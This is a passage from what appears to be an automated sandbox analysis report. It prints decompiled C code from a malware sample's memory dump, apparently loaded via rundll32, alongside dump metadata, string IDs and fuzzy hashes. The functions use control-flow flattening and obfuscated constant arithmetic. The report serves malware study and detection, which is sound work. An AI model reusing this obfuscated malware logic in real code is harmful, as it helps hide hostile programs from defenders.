                                                                                                                          				signed int _v1116;
                                                                                                                          				signed int _v1120;
                                                                                                                          				signed int _v1124;
                                                                                                                          				signed int _v1128;
                                                                                                                          				signed int _v1132;
                                                                                                                          				signed int _v1136;
                                                                                                                          				signed int _v1140;
                                                                                                                          				signed int _v1144;
                                                                                                                          				signed int _v1148;
                                                                                                                          				signed int _v1152;
                                                                                                                          				signed int _v1156;
                                                                                                                          				intOrPtr _t236;
                                                                                                                          				void* _t241;
                                                                                                                          				short* _t244;
                                                                                                                          				void* _t247;
                                                                                                                          				void* _t250;
                                                                                                                          				intOrPtr _t256;
                                                                                                                          				intOrPtr _t272;
                                                                                                                          				signed int _t278;
                                                                                                                          				signed int _t279;
                                                                                                                          				signed int _t280;
                                                                                                                          				signed int* _t283;
                                                                                                                          
                                                                                                                          				_t283 =  &_v1156;
                                                                                                                          				_v1048 = _v1048 & 0x00000000;
                                                                                                                          				_v1044 = _v1044 & 0x00000000;
                                                                                                                          				_t250 = 0x1242b9;
                                                                                                                          				_v1056 = 0xc74a30;
                                                                                                                          				_v1052 = 0xdc93e6;
                                                                                                                          				_v1140 = 0x94ae82;
                                                                                                                          				_v1140 = _v1140 * 0x5d;
                                                                                                                          				_v1140 = _v1140 | 0xd08f5b59;
                                                                                                                          				_t278 = 0x3b;
                                                                                                                          				_v1140 = _v1140 / _t278;
                                                                                                                          				_v1140 = _v1140 ^ 0x042b78b4;
                                                                                                                          				_v1060 = 0xf2c7d8;
                                                                                                                          				_v1060 = _v1060 >> 0xe;
                                                                                                                          				_v1060 = _v1060 ^ 0x000b32e4;
                                                                                                                          				_v1084 = 0xadf7c1;
                                                                                                                          				_v1084 = _v1084 >> 7;
                                                                                                                          				_v1084 = _v1084 ^ 0x0005ae79;
                                                                                                                          				_v1068 = 0x4ca2f2;
                                                                                                                          				_v1068 = _v1068 | 0x7f3e9315;
                                                                                                                          				_v1068 = _v1068 ^ 0x7f77e091;
                                                                                                                          				_v1148 = 0xfaa01c;
                                                                                                                          				_v1148 = _v1148 | 0x0a84fcb5;
                                                                                                                          				_t279 = 0x3d;
                                                                                                                          				_v1148 = _v1148 / _t279;
                                                                                                                          				_v1148 = _v1148 + 0xffff92ee;
                                                                                                                          				_v1148 = _v1148 ^ 0x0020489e;
                                                                                                                          				_v1104 = 0xbd50a4;
                                                                                                                          				_v1104 = _v1104 | 0x802f8c80;
                                                                                                                          				_v1104 = _v1104 ^ 0xe2a4d8db;
                                                                                                                          				_v1104 = _v1104 ^ 0x621899e9;
                                                                                                                          				_v1096 = 0x4ec4a;
                                                                                                                          				_t280 = 0x27;
                                                                                                                          				_v1096 = _v1096 / _t280;
                                                                                                                          				_v1096 = _v1096 ^ 0x000ca7f0;
                                                                                                                          				_v1156 = 0x496e13;
                                                                                                                          				_v1156 = _v1156 << 0xb;
                                                                                                                          				_v1156 = _v1156 + 0xffff34c4;
                                                                                                                          				_v1156 = _v1156 ^ 0xea67072b;
                                                                                                                          				_v1156 = _v1156 ^ 0xa10c07e0;
                                                                                                                          				_v1132 = 0x5417d7;
                                                                                                                          				_v1132 = _v1132 ^ 0x2d0a29d3;
                                                                                                                          				_v1132 = _v1132 * 0x11;
                                                                                                                          				_v1132 = _v1132 ^ 0x95d68b4c;
                                                                                                                          				_v1132 = _v1132 ^ 0x969bce68;
                                                                                                                          				_v1108 = 0x3d434d;
                                                                                                                          				_t83 =  &_v1108; // 0x3d434d
                                                                                                                          				_v1108 =  *_t83 * 0x5d;
                                                                                                                          				_v1108 = _v1108 + 0xbd1d;
                                                                                                                          				_v1108 = _v1108 ^ 0x16426462;
                                                                                                                          				_v1064 = 0x905f90;
                                                                                                                          				_v1064 = _v1064 << 7;
                                                                                                                          				_v1064 = _v1064 ^ 0x482aff2b;
                                                                                                                          				_v1076 = 0xa70fe8;
                                                                                                                          				_v1076 = _v1076 ^ 0x0f6696b3;
                                                                                                                          				_v1076 = _v1076 ^ 0x0fce7292;
                                                                                                                          				_v1144 = 0x5add64;
                                                                                                                          				_v1144 = _v1144 * 0x72;
                                                                                                                          				_v1144 = _v1144 >> 2;
                                                                                                                          				_v1144 = _v1144 + 0xffffbbe0;
                                                                                                                          				_v1144 = _v1144 ^ 0x0a105df6;
                                                                                                                          				_v1112 = 0xa934e1;
                                                                                                                          				_v1112 = _v1112 + 0xffff3dc6;
                                                                                                                          				_v1112 = _v1112 ^ 0xf71e7087;
                                                                                                                          				_v1112 = _v1112 ^ 0xf7bbdd65;
                                                                                                                          				_v1152 = 0xfe7bab;
                                                                                                                          				_v1152 = _v1152 + 0xffffe121;
                                                                                                                          				_v1152 = _v1152 << 7;
                                                                                                                          				_v1152 = _v1152 + 0xffffae88;
                                                                                                                          				_v1152 = _v1152 ^ 0x7f211c18;
                                                                                                                          				_v1092 = 0x242707;
                                                                                                                          				_v1092 = _v1092 >> 6;
                                                                                                                          				_v1092 = _v1092 ^ 0x0003c6d8;
                                                                                                                          				_v1136 = 0xebac4f;
                                                                                                                          				_v1136 = _v1136 + 0x4c15;
                                                                                                                          				_v1136 = _v1136 >> 0xf;
                                                                                                                          				_v1136 = _v1136 ^ 0xdf38e0e8;
                                                                                                                          				_v1136 = _v1136 ^ 0xdf3b1dfc;
                                                                                                                          				_v1120 = 0x4eb7ab;
                                                                                                                          				_v1120 = _v1120 << 2;
                                                                                                                          				_v1120 = _v1120 + 0xffff85cc;
                                                                                                                          				_v1120 = _v1120 ^ 0x01347c50;
                                                                                                                          				_v1088 = 0xc2f923;
                                                                                                                          				_v1088 = _v1088 * 0xf;
                                                                                                                          				_v1088 = _v1088 ^ 0x0b6c1f22;
                                                                                                                          				_v1080 = 0xbf02c1;
                                                                                                                          				_v1080 = _v1080 + 0xffffcd4c;
                                                                                                                          				_v1080 = _v1080 ^ 0x00bd8b7d;
                                                                                                                          				_v1128 = 0xfef10;
                                                                                                                          				_v1128 = _v1128 + 0xfa25;
                                                                                                                          				_v1128 = _v1128 + 0xffffb342;
                                                                                                                          				_v1128 = _v1128 + 0x2fe7;
                                                                                                                          				_v1128 = _v1128 ^ 0x00107547;
                                                                                                                          				_v1116 = 0x30091d;
                                                                                                                          				_v1116 = _v1116 | 0x682f5e67;
                                                                                                                          				_v1116 = _v1116 * 0xf;
                                                                                                                          				_v1116 = _v1116 ^ 0x1bb1960a;
                                                                                                                          				_v1100 = 0xdd7fbe;
                                                                                                                          				_v1100 = _v1100 >> 0xf;
                                                                                                                          				_v1100 = _v1100 + 0xffff26d4;
                                                                                                                          				_v1100 = _v1100 ^ 0xfff0a895;
                                                                                                                          				_v1072 = 0xd8d782;
                                                                                                                          				_v1072 = _v1072 + 0xffff857d;
                                                                                                                          				_v1072 = _v1072 ^ 0x00daabd2;
                                                                                                                          				_v1124 = 0x615b7c;
                                                                                                                          				_v1124 = _v1124 >> 0x10;
                                                                                                                          				_v1124 = _v1124 * 0x3d;
                                                                                                                          				_v1124 = _v1124 ^ 0x000147a1;
                                                                                                                          				L1:
                                                                                                                          				while(_t250 != 0x1242b9) {
                                                                                                                          					if(_t250 == 0x56337fc) {
                                                                                                                          						E007A6C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
                                                                                                                          						_push(_v1088);
                                                                                                                          						_push( &_v520);
                                                                                                                          						_push(_v1120);
                                                                                                                          						E007B13AD(_v1136,  &_v1040, __eflags);
                                                                                                                          						_t283 =  &(_t283[6]);
                                                                                                                          						_t250 = 0x8d6676f;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					if(_t250 == 0x5f94146) {
                                                                                                                          						_push(_v1148);
                                                                                                                          						_push(_v1068);
                                                                                                                          						_t241 = E007ADCF7(_v1084, 0x791000, __eflags);
                                                                                                                          						_t256 =  *0x7b3e10; // 0x0
                                                                                                                          						_t272 =  *0x7b3e10; // 0x0
                                                                                                                          						E007947CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
                                                                                                                          						E0079A8B0(_v1064, _t241, _v1076);
                                                                                                                          						_t283 =  &(_t283[9]);
                                                                                                                          						_t250 = 0x56337fc;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					if(_t250 == 0x8d6676f) {
                                                                                                                          						_t244 = E0079B6CF( &_v1040, _v1080, _v1128, _v1116);
                                                                                                                          						__eflags = 0;
                                                                                                                          						 *_t244 = 0;
                                                                                                                          						return E0079B1C6( &_v1040, _v1100, _v1072, _v1124);
                                                                                                                          					}
                                                                                                                          					if(_t250 == 0xbcbde3e) {
                                                                                                                          						_t247 = E007A473C();
                                                                                                                          						L8:
                                                                                                                          						_t250 = 0x5f94146;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					if(_t250 != 0xf4317dc) {
                                                                                                                          						L15:
                                                                                                                          						__eflags = _t250 - 0xfb0317f;
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						return _t247;
                                                                                                                          					}
                                                                                                                          					_t247 = E00793E3F();
                                                                                                                          					goto L8;
                                                                                                                          				}
                                                                                                                          				_t236 =  *0x7b3e10; // 0x0
                                                                                                                          				__eflags =  *((intOrPtr*)(_t236 + 0x450));
                                                                                                                          				if(__eflags == 0) {
                                                                                                                          					_t250 = 0xf4317dc;
                                                                                                                          					goto L15;
                                                                                                                          				}
                                                                                                                          				_t250 = 0xbcbde3e;
                                                                                                                          				goto L1;
                                                                                                                          			}


                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: MC=$g^/h$|[a$/
                                                                                                                          • API String ID: 0-1545830693
                                                                                                                          • Opcode ID: 85de990929a238b3706081e4f55c347ef85626abd4bc4f1896f6fe7ec276e281
                                                                                                                          • Instruction ID: e2907652253dd5889d84399fe71cc534cfe84086222c1113fa4ac5e476c46678
                                                                                                                          • Opcode Fuzzy Hash: 85de990929a238b3706081e4f55c347ef85626abd4bc4f1896f6fe7ec276e281
                                                                                                                          • Instruction Fuzzy Hash: 34C110B11083858FC7A8CF25D58A91BFBE1FBC1758F508A1DF19256260D7B98A4ACF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E007AA2E8(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                          				intOrPtr _v4;
                                                                                                                          				intOrPtr* _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				char _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				intOrPtr _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				intOrPtr _t184;
                                                                                                                          				intOrPtr* _t189;
                                                                                                                          				intOrPtr _t193;
                                                                                                                          				intOrPtr _t196;
                                                                                                                          				intOrPtr _t197;
                                                                                                                          				intOrPtr _t198;
                                                                                                                          				intOrPtr _t204;
                                                                                                                          				intOrPtr _t205;
                                                                                                                          				signed int _t223;
                                                                                                                          				signed int _t224;
                                                                                                                          				signed int _t225;
                                                                                                                          				intOrPtr _t226;
                                                                                                                          				void* _t228;
                                                                                                                          				signed int _t229;
                                                                                                                          				intOrPtr _t230;
                                                                                                                          				signed int* _t231;
                                                                                                                          
                                                                                                                          				_t198 = __ecx;
                                                                                                                          				_t231 =  &_v92;
                                                                                                                          				_v8 = __edx;
                                                                                                                          				_v24 = __ecx;
                                                                                                                          				_v28 = 0x24c7b9;
                                                                                                                          				_v28 = _v28 << 9;
                                                                                                                          				_v28 = _v28 ^ 0x498f7200;
                                                                                                                          				_v76 = 0x5897f7;
                                                                                                                          				_v76 = _v76 + 0xffffedf4;
                                                                                                                          				_v76 = _v76 << 0xf;
                                                                                                                          				_v76 = _v76 + 0x73e5;
                                                                                                                          				_v76 = _v76 ^ 0x42f7f56f;
                                                                                                                          				_v52 = 0x46ab19;
                                                                                                                          				_v52 = _v52 << 0xd;
                                                                                                                          				_t228 = 0xe611c04;
                                                                                                                          				_v20 = _v20 & 0x00000000;
                                                                                                                          				_t223 = 0x66;
                                                                                                                          				_v52 = _v52 / _t223;
                                                                                                                          				_v52 = _v52 ^ 0x0211beab;
                                                                                                                          				_v80 = 0x97c948;
                                                                                                                          				_v80 = _v80 ^ 0xfb972484;
                                                                                                                          				_v80 = _v80 << 2;
                                                                                                                          				_v80 = _v80 << 0xf;
                                                                                                                          				_v80 = _v80 ^ 0xdb950905;
                                                                                                                          				_v44 = 0x96980f;
                                                                                                                          				_v44 = _v44 ^ 0xfeb8bb56;
                                                                                                                          				_v44 = _v44 ^ 0xfe2f3013;
                                                                                                                          				_v64 = 0x454cfa;
                                                                                                                          				_v64 = _v64 ^ 0x45fe36ac;
                                                                                                                          				_t224 = 0x43;
                                                                                                                          				_v64 = _v64 / _t224;
                                                                                                                          				_v64 = _v64 ^ 0x010b84d0;
                                                                                                                          				_v68 = 0xb73a82;
                                                                                                                          				_v68 = _v68 | 0xd419dac3;
                                                                                                                          				_t225 = 0x23;
                                                                                                                          				_v68 = _v68 / _t225;
                                                                                                                          				_v68 = _v68 ^ 0x061f1f3c;
                                                                                                                          				_v60 = 0xe80863;
                                                                                                                          				_v60 = _v60 * 7;
                                                                                                                          				_v60 = _v60 ^ 0x88fb80a0;
                                                                                                                          				_v60 = _v60 ^ 0x8ea007f2;
                                                                                                                          				_v40 = 0x80f530;
                                                                                                                          				_v40 = _v40 ^ 0xcef24483;
                                                                                                                          				_v40 = _v40 ^ 0xce7935e2;
                                                                                                                          				_v92 = 0x233377;
                                                                                                                          				_v92 = _v92 ^ 0x61e14959;
                                                                                                                          				_v92 = _v92 + 0xffffa5e4;
                                                                                                                          				_v92 = _v92 + 0xf94b;
                                                                                                                          				_v92 = _v92 ^ 0x61c7ad44;
                                                                                                                          				_v88 = 0xbad9cc;
                                                                                                                          				_v88 = _v88 | 0x5a2a09a8;
                                                                                                                          				_v88 = _v88 * 0x2f;
                                                                                                                          				_v88 = _v88 | 0xecc1c683;
                                                                                                                          				_v88 = _v88 ^ 0xecc3849f;
                                                                                                                          				_v56 = 0xb0d301;
                                                                                                                          				_v56 = _v56 + 0xa0bb;
                                                                                                                          				_v56 = _v56 << 0xf;
                                                                                                                          				_v56 = _v56 ^ 0xb9db0742;
                                                                                                                          				_v36 = 0xab48cf;
                                                                                                                          				_v36 = _v36 * 0x24;
                                                                                                                          				_v36 = _v36 ^ 0x1811952a;
                                                                                                                          				_v84 = 0x104632;
                                                                                                                          				_v84 = _v84 + 0x4a21;
                                                                                                                          				_v84 = _v84 ^ 0x8dbd106a;
                                                                                                                          				_v84 = _v84 + 0xfe54;
                                                                                                                          				_v84 = _v84 ^ 0x8daed025;
                                                                                                                          				_t226 = _v4;
                                                                                                                          				_t197 = _v8;
                                                                                                                          				_t230 = _v8;
                                                                                                                          				_v72 = 0x1611ea;
                                                                                                                          				_v72 = _v72 ^ 0xe055e86d;
                                                                                                                          				_v72 = _v72 >> 0xd;
                                                                                                                          				_v72 = _v72 >> 5;
                                                                                                                          				_v72 = _v72 ^ 0x0003993e;
                                                                                                                          				_v32 = 0x799484;
                                                                                                                          				_v32 = _v32 ^ 0xb4488d59;
                                                                                                                          				_v32 = _v32 ^ 0xb439947f;
                                                                                                                          				L1:
                                                                                                                          				while(1) {
                                                                                                                          					do {
                                                                                                                          						while(_t228 != 0x5161e0c) {
                                                                                                                          							if(_t228 == 0xb95f952) {
                                                                                                                          								_t229 = E007AC032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
                                                                                                                          								_t231 =  &(_t231[5]);
                                                                                                                          								_v20 = _t229;
                                                                                                                          								if(_t229 == 0) {
                                                                                                                          									L18:
                                                                                                                          									E007A8519(_v72, _v32, _t197);
                                                                                                                          								} else {
                                                                                                                          									_t204 = _v16;
                                                                                                                          									if(_t204 == 0) {
                                                                                                                          										L17:
                                                                                                                          										if(_t229 != 0) {
                                                                                                                          											_t189 = _v8;
                                                                                                                          											 *_t189 = _t197;
                                                                                                                          											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
                                                                                                                          										} else {
                                                                                                                          											goto L18;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										_v48 = _v48 + _t204;
                                                                                                                          										_t230 = _t230 - _t204;
                                                                                                                          										if(_t230 != 0) {
                                                                                                                          											L10:
                                                                                                                          											_t184 = _v48;
                                                                                                                          											L11:
                                                                                                                          											_t198 = _v24;
                                                                                                                          											_t228 = 0xb95f952;
                                                                                                                          											continue;
                                                                                                                          										} else {
                                                                                                                          											_t205 = _t226 + _t226;
                                                                                                                          											_push(_t205);
                                                                                                                          											_push(_t205);
                                                                                                                          											_v12 = _t205;
                                                                                                                          											_t193 = E00797FF2(_t205);
                                                                                                                          											_v48 = _t193;
                                                                                                                          											if(_t193 == 0) {
                                                                                                                          												goto L17;
                                                                                                                          											} else {
                                                                                                                          												E0079ED7E(_v88, _t193, _v56, _t197, _t226);
                                                                                                                          												E007A8519(_v36, _v84, _t197);
                                                                                                                          												_t197 = _v48;
                                                                                                                          												_t230 = _t226;
                                                                                                                          												_t231 =  &(_t231[4]);
                                                                                                                          												_t196 = _t197 + _t226;
                                                                                                                          												_t226 = _v12;
                                                                                                                          												_v48 = _t196;
                                                                                                                          												if(_t230 == 0) {
                                                                                                                          													goto L17;
                                                                                                                          												} else {
                                                                                                                          													goto L10;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_t228 != 0xe611c04) {
                                                                                                                          									goto L15;
                                                                                                                          								} else {
                                                                                                                          									_t228 = 0x5161e0c;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L20:
                                                                                                                          							return _t229;
                                                                                                                          						}
                                                                                                                          						_t226 = 0x10000;
                                                                                                                          						_push(_t198);
                                                                                                                          						_push(_t198);
                                                                                                                          						_t184 = E00797FF2(0x10000);
                                                                                                                          						_t197 = _t184;
                                                                                                                          						if(_t197 == 0) {
                                                                                                                          							_t198 = _v24;
                                                                                                                          							_t228 = 0xa3056fc;
                                                                                                                          							goto L15;
                                                                                                                          						} else {
                                                                                                                          							_v48 = _t184;
                                                                                                                          							_t230 = 0x10000;
                                                                                                                          							goto L11;
                                                                                                                          						}
                                                                                                                          						goto L20;
                                                                                                                          						L15:
                                                                                                                          						_t184 = _v48;
                                                                                                                          					} while (_t228 != 0xa3056fc);
                                                                                                                          					_t229 = _v20;
                                                                                                                          					goto L17;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          0x007aa49b
                                                                                                                          0x007aa49f
                                                                                                                          0x007aa4a7
                                                                                                                          0x007aa4af
                                                                                                                          0x007aa4b7
                                                                                                                          0x007aa4bf
                                                                                                                          0x007aa4c7
                                                                                                                          0x007aa4cf
                                                                                                                          0x007aa4d3
                                                                                                                          0x007aa4d7
                                                                                                                          0x007aa4df
                                                                                                                          0x007aa4e7
                                                                                                                          0x007aa4ef
                                                                                                                          0x007aa4f4
                                                                                                                          0x007aa4f9
                                                                                                                          0x007aa501
                                                                                                                          0x007aa509
                                                                                                                          0x007aa511
                                                                                                                          0x00000000
                                                                                                                          0x007aa519
                                                                                                                          0x007aa519
                                                                                                                          0x007aa519
                                                                                                                          0x007aa52b
                                                                                                                          0x007aa559
                                                                                                                          0x007aa55b
                                                                                                                          0x007aa55e
                                                                                                                          0x007aa564
                                                                                                                          0x007aa63c
                                                                                                                          0x007aa645
                                                                                                                          0x007aa56a
                                                                                                                          0x007aa56a
                                                                                                                          0x007aa570
                                                                                                                          0x007aa638
                                                                                                                          0x007aa63a
                                                                                                                          0x007aa651
                                                                                                                          0x007aa657
                                                                                                                          0x007aa659
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007aa576
                                                                                                                          0x007aa576
                                                                                                                          0x007aa57a
                                                                                                                          0x007aa57c
                                                                                                                          0x007aa5df
                                                                                                                          0x007aa5df
                                                                                                                          0x007aa5e3
                                                                                                                          0x007aa5e3
                                                                                                                          0x007aa5e7
                                                                                                                          0x00000000
                                                                                                                          0x007aa57e
                                                                                                                          0x007aa582
                                                                                                                          0x007aa58f
                                                                                                                          0x007aa590
                                                                                                                          0x007aa591
                                                                                                                          0x007aa595
                                                                                                                          0x007aa59a
                                                                                                                          0x007aa5a2
                                                                                                                          0x00000000
                                                                                                                          0x007aa5a8
                                                                                                                          0x007aa5b4
                                                                                                                          0x007aa5c2
                                                                                                                          0x007aa5c7
                                                                                                                          0x007aa5cb
                                                                                                                          0x007aa5cd
                                                                                                                          0x007aa5d0
                                                                                                                          0x007aa5d3
                                                                                                                          0x007aa5d7
                                                                                                                          0x007aa5dd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007aa5dd
                                                                                                                          0x007aa5a2
                                                                                                                          0x007aa57c
                                                                                                                          0x007aa570
                                                                                                                          0x007aa52d
                                                                                                                          0x007aa533
                                                                                                                          0x00000000
                                                                                                                          0x007aa539
                                                                                                                          0x007aa539
                                                                                                                          0x00000000
                                                                                                                          0x007aa539
                                                                                                                          0x007aa533
                                                                                                                          0x007aa65d
                                                                                                                          0x007aa665
                                                                                                                          0x007aa665
                                                                                                                          0x007aa5f5
                                                                                                                          0x007aa604
                                                                                                                          0x007aa605
                                                                                                                          0x007aa606
                                                                                                                          0x007aa60b
                                                                                                                          0x007aa611
                                                                                                                          0x007aa61b
                                                                                                                          0x007aa61f
                                                                                                                          0x00000000
                                                                                                                          0x007aa613
                                                                                                                          0x007aa613
                                                                                                                          0x007aa617
                                                                                                                          0x00000000
                                                                                                                          0x007aa617
                                                                                                                          0x00000000
                                                                                                                          0x007aa624
                                                                                                                          0x007aa624
                                                                                                                          0x007aa628
                                                                                                                          0x007aa634
                                                                                                                          0x00000000
                                                                                                                          0x007aa634

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !J$YIa$mU$s
                                                                                                                          • API String ID: 0-3335770892
                                                                                                                          • Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                          • Instruction ID: 7f03a4da932603fbbeb5d34701a58e5834a5430420da23b026d70951c4a7a94b
                                                                                                                          • Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                          • Instruction Fuzzy Hash: 92914FB1909340ABC358DF29C18980BFBF1BBC5758F544A1EF99597220D3B8DA08CB87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00794EE3(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				intOrPtr _v88;
                                                                                                                          				char _v608;
                                                                                                                          				void* _t203;
                                                                                                                          				void* _t204;
                                                                                                                          				void* _t207;
                                                                                                                          				signed int _t212;
                                                                                                                          				signed int _t213;
                                                                                                                          				signed int _t214;
                                                                                                                          				signed int _t215;
                                                                                                                          				intOrPtr _t216;
                                                                                                                          				void* _t221;
                                                                                                                          
                                                                                                                          				_v84 = _v84 & 0x00000000;
                                                                                                                          				_v88 = 0xf9097a;
                                                                                                                          				_v32 = 0xbcbe1d;
                                                                                                                          				_v32 = _v32 << 9;
                                                                                                                          				_v32 = _v32 << 9;
                                                                                                                          				_v32 = _v32 << 0xb;
                                                                                                                          				_v32 = _v32 ^ 0xa0062323;
                                                                                                                          				_v16 = 0x782140;
                                                                                                                          				_v16 = _v16 + 0xfffffe34;
                                                                                                                          				_v16 = _v16 + 0xfffffe18;
                                                                                                                          				_v16 = _v16 << 0xa;
                                                                                                                          				_v16 = _v16 ^ 0xe0701d9a;
                                                                                                                          				_v40 = 0x7af846;
                                                                                                                          				_v40 = _v40 + 0xffff28b3;
                                                                                                                          				_v40 = _v40 << 0xd;
                                                                                                                          				_v40 = _v40 + 0xffffd351;
                                                                                                                          				_v40 = _v40 ^ 0x441384bc;
                                                                                                                          				_v68 = 0xebfd4;
                                                                                                                          				_v68 = _v68 + 0xffff2b98;
                                                                                                                          				_t212 = 0x4b;
                                                                                                                          				_v68 = _v68 / _t212;
                                                                                                                          				_v68 = _v68 ^ 0x000f3184;
                                                                                                                          				_v48 = 0x77c678;
                                                                                                                          				_t213 = 0x72;
                                                                                                                          				_v48 = _v48 * 0x4d;
                                                                                                                          				_v48 = _v48 + 0x6b8c;
                                                                                                                          				_v48 = _v48 ^ 0x240efbe4;
                                                                                                                          				_v24 = 0xae1064;
                                                                                                                          				_v24 = _v24 / _t213;
                                                                                                                          				_v24 = _v24 << 7;
                                                                                                                          				_v24 = _v24 ^ 0x1be7fa9d;
                                                                                                                          				_v24 = _v24 ^ 0x1b226397;
                                                                                                                          				_v72 = 0x44bde7;
                                                                                                                          				_v72 = _v72 | 0x5f63ee23;
                                                                                                                          				_v72 = _v72 ^ 0x5f6de837;
                                                                                                                          				_v56 = 0x5a94a4;
                                                                                                                          				_v56 = _v56 >> 9;
                                                                                                                          				_t214 = 0xc;
                                                                                                                          				_v56 = _v56 * 0x2a;
                                                                                                                          				_v56 = _v56 ^ 0x0003dc1b;
                                                                                                                          				_v8 = 0x2a4d30;
                                                                                                                          				_v8 = _v8 + 0xff2b;
                                                                                                                          				_v8 = _v8 | 0x9a82811b;
                                                                                                                          				_v8 = _v8 << 0xc;
                                                                                                                          				_v8 = _v8 ^ 0xbcdbc31f;
                                                                                                                          				_v64 = 0xa41a91;
                                                                                                                          				_v64 = _v64 | 0x62aa1889;
                                                                                                                          				_v64 = _v64 << 0xd;
                                                                                                                          				_v64 = _v64 ^ 0xc357e7aa;
                                                                                                                          				_v36 = 0x90fe9;
                                                                                                                          				_v36 = _v36 >> 0xa;
                                                                                                                          				_v36 = _v36 | 0x57d87c49;
                                                                                                                          				_v36 = _v36 / _t214;
                                                                                                                          				_v36 = _v36 ^ 0x0755636a;
                                                                                                                          				_v28 = 0x5fda7e;
                                                                                                                          				_v28 = _v28 + 0xffff2d0f;
                                                                                                                          				_v28 = _v28 << 0xa;
                                                                                                                          				_v28 = _v28 + 0xdffb;
                                                                                                                          				_v28 = _v28 ^ 0x7c1a8a5e;
                                                                                                                          				_v20 = 0xaf632f;
                                                                                                                          				_v20 = _v20 >> 8;
                                                                                                                          				_v20 = _v20 << 9;
                                                                                                                          				_v20 = _v20 >> 0xf;
                                                                                                                          				_v20 = _v20 ^ 0x0003fa93;
                                                                                                                          				_v12 = 0x960758;
                                                                                                                          				_v12 = _v12 ^ 0x64ee01f0;
                                                                                                                          				_v12 = _v12 | 0x3d3dd2ba;
                                                                                                                          				_v12 = _v12 << 7;
                                                                                                                          				_v12 = _v12 ^ 0xbeed48c5;
                                                                                                                          				_v80 = 0xba0fdf;
                                                                                                                          				_v80 = _v80 + 0xfd2d;
                                                                                                                          				_v80 = _v80 ^ 0x00b93168;
                                                                                                                          				_v60 = 0x5f834c;
                                                                                                                          				_v60 = _v60 ^ 0x963b7b6a;
                                                                                                                          				_t215 = 0x3f;
                                                                                                                          				_v60 = _v60 * 0x3e;
                                                                                                                          				_v60 = _v60 ^ 0x6c73d449;
                                                                                                                          				_v76 = 0x4b89c6;
                                                                                                                          				_v76 = _v76 >> 6;
                                                                                                                          				_v76 = _v76 ^ 0x0008f57a;
                                                                                                                          				_v52 = 0x3d488e;
                                                                                                                          				_v52 = _v52 << 6;
